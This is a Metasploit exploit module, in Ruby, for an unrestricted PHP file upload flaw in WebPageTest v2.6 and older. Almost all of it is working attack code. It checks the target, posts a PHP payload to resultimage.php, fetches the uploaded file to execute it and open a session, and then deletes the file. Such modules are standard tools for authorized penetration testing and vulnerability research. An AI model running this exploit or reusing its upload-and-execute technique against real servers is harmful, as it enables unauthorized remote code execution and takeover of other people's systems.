This Metasploit module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before saving it to disk, and then places this item in the web directory accessable by remote users. This flaw can be abused to gain remote code execution.
12ff7aba4342dfbb7f5a516aa01579569cbaf4c1cb86bb84f42047ca2ada8e0b
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "WebPageTest Arbitrary PHP File Upload",
'Description' => %q{
This module exploits a vulnerability found in WebPageTest's Upload Feature. By
default, the resultimage.php file does not verify the user-supplied item before
saving it to disk, and then places this item in the web directory accessable by
remote users. This flaw can be abused to gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'dun', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '83822'],
['EDB', '19790']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['WebPageTest v2.6 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jul 13 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")
res1 = send_request_raw({'uri'=>"#{base}/index.php"})
res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
res2 and res2.code == 200
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def on_new_session(cli)
if cli.type != "meterpreter"
print_error("No automatic cleanup for you. Please manually remove: #{@target_path}")
return
end
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
cli.fs.file.rm(@target_path)
print_status("#{@target_path} removed")
end
def exploit
peer = "#{rhost}:#{rport}"
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")
p = payload.encoded
fname = "blah.php"
data = Rex::MIME::Message.new
data.add_part(
"<?php #{p} ?>", #Data is our payload
'multipart/form-data', #Content Type
nil, #Transfer Encoding
"form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition
)
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/work/resultimage.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if not res
print_error("#{peer} - No response from host")
return
end
@target_path = "#{base}/results/#{fname}"
print_status("#{peer} - Requesting #{@target_path}")
res = send_request_cgi({'uri'=>@target_path})
handler
if res and res.code == 404
print_error("#{peer} - Payload failed to upload")
end
end
end